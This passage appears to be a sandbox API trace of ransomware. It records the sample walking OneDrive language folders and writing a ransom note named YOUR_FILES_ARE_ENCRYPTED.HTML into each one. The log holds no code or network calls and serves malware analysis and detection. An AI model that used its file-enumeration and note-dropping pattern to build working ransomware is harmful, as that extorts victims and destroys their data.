pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.141] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.141] lstrlenW (lpString=".mui") returned 4 [0113.141] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.141] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65834c57, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x65834c57, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65b2fd08, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.141] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0113.141] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.141] GetProcessHeap () returned 0x600000 [0113.141] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\prs-af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.142] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.143] CloseHandle (hObject=0x32c) returned 1 [0113.143] GetProcessHeap () returned 0x600000 [0113.143] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.143] GetProcessHeap () returned 0x600000 [0113.143] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.144] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661645b7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x661645b7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x661645b7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pt-br", cAlternateFileName="")) returned 1 [0113.144] StrStrIW (lpFirst="pt-br", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.144] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br") returned 81 [0113.144] GetProcessHeap () returned 0x600000 [0113.144] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.147] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br" [0113.147] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br\\*" [0113.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661645b7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x661645b7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66f401b4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.148] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661645b7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x661645b7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66f401b4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.148] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f401b4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x66f401b4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6758246d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.148] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.148] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.148] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.148] lstrlenW (lpString=".mui") returned 4 [0113.148] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.148] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f401b4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x66f401b4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6758246d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.148] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.148] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.148] GetProcessHeap () returned 0x600000 [0113.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-br\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.149] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.150] CloseHandle (hObject=0x32c) returned 1 [0113.150] GetProcessHeap () returned 0x600000 [0113.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.150] GetProcessHeap () returned 0x600000 [0113.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.151] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6761ad3f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6761ad3f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6761ad3f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0113.151] StrStrIW (lpFirst="pt-pt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.151] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt") returned 81 [0113.151] GetProcessHeap () returned 0x600000 [0113.151] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.152] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt" [0113.152] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt\\*" [0113.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6761ad3f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6761ad3f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6787d40a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6761ad3f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6761ad3f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6787d40a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.153] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6787d40a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6787d40a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67b05aac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.153] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.153] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.153] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.154] lstrlenW (lpString=".mui") returned 4 [0113.154] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.154] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6787d40a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6787d40a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67b05aac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.154] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.154] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.154] GetProcessHeap () returned 0x600000 [0113.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pt-pt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.155] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.155] CloseHandle (hObject=0x32c) returned 1 [0113.155] GetProcessHeap () returned 0x600000 [0113.156] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.156] GetProcessHeap () returned 0x600000 [0113.156] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.156] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67d68156, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67d68156, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67d68156, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="qut-latn", cAlternateFileName="")) returned 1 [0113.156] StrStrIW (lpFirst="qut-latn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.156] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn") returned 84 [0113.156] GetProcessHeap () returned 0x600000 [0113.156] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.156] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn" [0113.156] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn\\*" [0113.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67d68156, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67d68156, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6820824a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.156] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67d68156, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67d68156, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6820824a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.156] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6820824a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6820824a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x684b56cd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.156] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.156] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn\\FileSync.LocalizedResources.dll.mui") returned 120 [0113.156] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.156] lstrlenW (lpString=".mui") returned 4 [0113.156] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.156] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6820824a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6820824a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x684b56cd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.156] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.156] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0113.156] GetProcessHeap () returned 0x600000 [0113.156] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\qut-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.157] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.158] CloseHandle (hObject=0x32c) returned 1 [0113.158] GetProcessHeap () returned 0x600000 [0113.158] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.158] GetProcessHeap () returned 0x600000 [0113.158] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.158] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68501b94, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68501b94, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68501b94, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="quz-pe", cAlternateFileName="")) returned 1 [0113.158] StrStrIW (lpFirst="quz-pe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.158] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe") returned 82 [0113.158] GetProcessHeap () returned 0x600000 [0113.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.158] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe" [0113.158] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe\\*" [0113.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\quz-pe\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68501b94, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68501b94, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68ad15e9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.159] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68501b94, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68501b94, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68ad15e9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.159] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ad15e9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68ad15e9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6902ec5e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.159] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.159] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, 